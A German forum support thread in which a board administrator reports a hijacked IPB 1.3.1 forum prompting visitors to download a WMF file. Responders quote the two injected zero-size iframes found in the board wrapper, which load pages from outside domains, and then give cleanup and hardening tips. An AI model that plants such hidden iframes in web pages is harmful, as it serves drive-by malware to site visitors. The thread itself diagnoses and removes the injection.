Jump to content
InvisionCommunity.de - Der Deutsche Invision Community Support
Sign in to follow this  
RubberDuck

IPB 1.3.1 gehackt??

Recommended Posts

Hallo,

habe erst vor kurzem die seite übernommen ( www.gfeclan.de )und noch keine erfahrung mit dem IPB board aber es sieht so aus als ob jemand das Board gehackt hat .

Und zwar kommt beim öfnen des forums ein fenster wo ich eine datei herunterladen soll (xpladv463.wmf von traffbuck.biz) und eine Skript-eingabeaufforderung und das war es (AOL-Browser).

Der Explorer arbeitet erst gar nicht bzw er wechselt sich ab keine rückmeldung und wird ausgeführt aber das forum wird nicht geladen .

Edited by RubberDuck

Share this post


Link to post

Scheint am Browser zu liegen, bei mir im Firefox/Linux kann ich das besagte Forum ohne Probleme besuchen.

Ich werde nicht gefragt, ob ich eine Datei runterladen will, etc.

Lade dir mal einen anderen Broswer runter und nutze nicht AOL/Explorer und versuch dann es mal.

Share this post


Link to post

Also das Board wurde "angehackt" und im Wapper

ist was drin was da nicht rein gehört !

<iframe src="http://196.regvista.com/index.php?ref=wde" width="0" height="0" frameborder="0"></iframe>

<iframe src="http://traffbucks.biz/dl/adv463.php" width="0" height="0" frameborder="0"></iframe>

Share this post


Link to post

Also danke schon mal aber wo finde ich die datei Wapper?

habe schon einiges durchsucht scheint so als wenn ich blind währe.

Edited by RubberDuck

Share this post


Link to post

Geh mal ins das Admin CP!

Linkes Menu -> Skins and Templates

Dann "Board Wrappers" (erscheint unter "Skins and Templates") wählen und dann im Hauptfenster (rechtes Fenster) bei dem Skin auf Edit gehen.

Share this post


Link to post

Dieser Thread hat mir soeben auch geholfen. Vielen Dank!!!

Kann mir jemand Tipps geben, welche Maßnahmen bei meinem Board am erforderlichsten sind, um sich in Zukunft vor solchen Attacken besser zu schützen?

FTP-Passwort und Datenbankpasswort habe ich geändert. Aber da wird's sicher noch etwas mehr für mich zu tun geben.

Hier die Adresse zum Board: Drop City Ost

Danke im voraus, viele Grüße usw.

Share this post


Link to post

@wortmax: Schütze Dein admin.php (Einstiegsseite zum Admin CP) noch durch eine .htacess und .htpsswd Datei. Wies' geht, findste hier mithilfe der Suchfunktion.

Edited by Tweedle-Dee

Share this post


Link to post

Hatte soeben das selbe Problem, ebenfalls in der Wrapper eine iframe drinnen gewesen, der nicht reingehört.

Hab jetzt mal die Schreibrechte am Server bestimmter dateien herunter gesetzt!

htacces schutz für die admin.php folgt demnächst!

Share this post


Link to post

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

Sign in to follow this  

×